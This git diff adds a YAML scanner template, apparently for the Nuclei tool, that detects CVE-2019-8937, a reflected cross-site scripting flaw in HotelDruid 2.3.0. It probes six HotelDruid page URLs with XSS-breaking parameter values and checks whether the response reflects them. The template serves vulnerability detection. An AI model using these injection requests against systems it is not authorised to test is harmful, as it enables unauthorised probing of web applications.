diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml
new file mode 100644
index 0000000000..3e7aef68bc
--- /dev/null
+++ b/cves/2019/CVE-2019-8937.yaml
@@ -0,0 +1,29 @@
+id: CVE-2019-8937
+
+info:
+ name: HotelDruid 2.3.0 - XSS
+ author: Borna Nematzadeh
+ severity: medium
+ refrense: https://www.exploit-db.com/exploits/46429
+ tags: cve,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671">'
+ - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">'
+ - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">'
+ - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">'
+ - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">'
+ - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '">'
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
\ No newline at end of file